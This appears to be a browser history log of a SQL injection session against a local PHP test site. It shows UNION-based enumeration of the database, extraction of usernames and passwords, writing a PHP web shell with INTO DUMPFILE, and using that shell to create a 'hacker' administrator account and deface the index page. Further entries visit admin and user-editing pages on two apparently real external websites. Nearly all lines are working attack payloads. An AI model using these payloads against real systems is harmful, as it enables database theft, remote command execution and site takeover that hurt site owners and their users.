http://127.0.0.1/news.php?newsid=2
http://127.0.0.1/news.php?newsid=2 and 1=2
http://127.0.0.1/news.php?newsid=2 and 1=1
http://127.0.0.1/news.php?newsid=2%27
http://127.0.0.1/news.php?newsid=1
http://127.0.0.1/1.php?c=net localgroup /add administrators hacker
http://127.0.0.1/1.php?c=net user hacker 123456
http://127.0.0.1/1.php?c=net user
http://127.0.0.1/1.php?c=net user /add hacker
http://127.0.0.1/1.php?c=dir
http://127.0.0.1/1.php
http://127.0.0.1/news.php?newsid=231 union select 1,%27%3Cpre%3E%3C?php system(%22$_GET[c]%22);?%3E%27 into dumpfile %27C:\\wamp\\www\\1.php%27
http://127.0.0.1/
http://127.0.0.1/news.php?newsid=231 union select %27%27,%27hacked by class%27 into dumpfile %27C:\\wamp\\www\\index.html%27
http://127.0.0.1/2.txt
http://127.0.0.1/news.php?newsid=231 union select 1,2 into dumpfile %27C:\\wamp\\www\\2.txt%27
http://127.0.0.1/1.txt
http://127.0.0.1/news.php?newsid=1 union select 1,2 into dumpfile %27C:\\wamp\\www\\1.txt%27
http://127.0.0.1/news.php?newsid=1 union select 1,2 into dumpfile %27%27
http://127.0.0.1/news.php?newsid=1 union select 1,2
http://127.0.0.1/news.php?newsid=221 union select 1,2
http://127.0.0.1/news.php?newsid=221 union 1,2
http://127.0.0.1/news.php?newsid=221 union select username,password from tblusers
http://127.0.0.1/news.php?newsid=221 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x74626c7573657273
http://string-functions.com/string-hex.aspx
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CB8QFjAA&url=http%3A%2F%2Fstring-functions.com%2Fstring-hex.aspx&ei=cUtvVNTfHuj4yQPqx4DgBw&usg=AFQjCNFKXIYNZweDUycZQwe6RTUi6arRBw
https://www.google.com/search?q=string+hex&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb
http://127.0.0.1/news.php?newsid=221 union select 1,group_concat(column_name) from information_schema.columns where table_name=%27tblusers%27
http://127.0.0.1/news.php?newsid=221 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
http://127.0.0.1/news.php?newsid=221 union select 1,group_concat(table_name) from information_schema.tables where table_schema=%27mysite%27
http://127.0.0.1/news.php?newsid=221 union select 1,user()
http://127.0.0.1/news.php?newsid=221 union select 1,database()
http://127.0.0.1/news.php?newsid=221 union select 1,@@version
http://127.0.0.1/news.php?newsid=1 order by 3
http://127.0.0.1/news.php?newsid=1 order by 2
http://php.net/manual/en/function.mysql-real-escape-string.php
http://www.feuerwehr-holzgerlingen.de/index.php?show=admin
http://www.feuerwehr-holzgerlingen.de/index.php?login
http://www.feuerwehr-holzgerlingen.de/index.php?logout&login
http://www.feuerwehr-holzgerlingen.de/index.php?logout
http://www.feuerwehr-holzgerlingen.de/
http://www.feuerwehr-holzgerlingen.de/index.php?show=einsatz&id=621&login
http://www.bridgecitytex.com/nControl/userpop.php?action=new&target=users1&id=NEW
http://www.bridgecitytex.com/nControl/userpop.php
http://www.bridgecitytex.com/pageedit.php?target=main_panel&mod=tools&pageid=
http://www.bridgecitytex.com/pageedit.php
http://www.bridgecitytex.com/nControl/userpop.php?target=users1&action=edit&id=3
http://www.bridgecitytex.com/nControl/userpop.php?action=showall&target=users1
http://www.bridgecitytex.com/login.php?target=main_panel&mod=tools&pageid=
http://www.bridgecitytex.com/login.php?target=main_panel&mod=stats&pageid=
http://www.bridgecitytex.com/login.php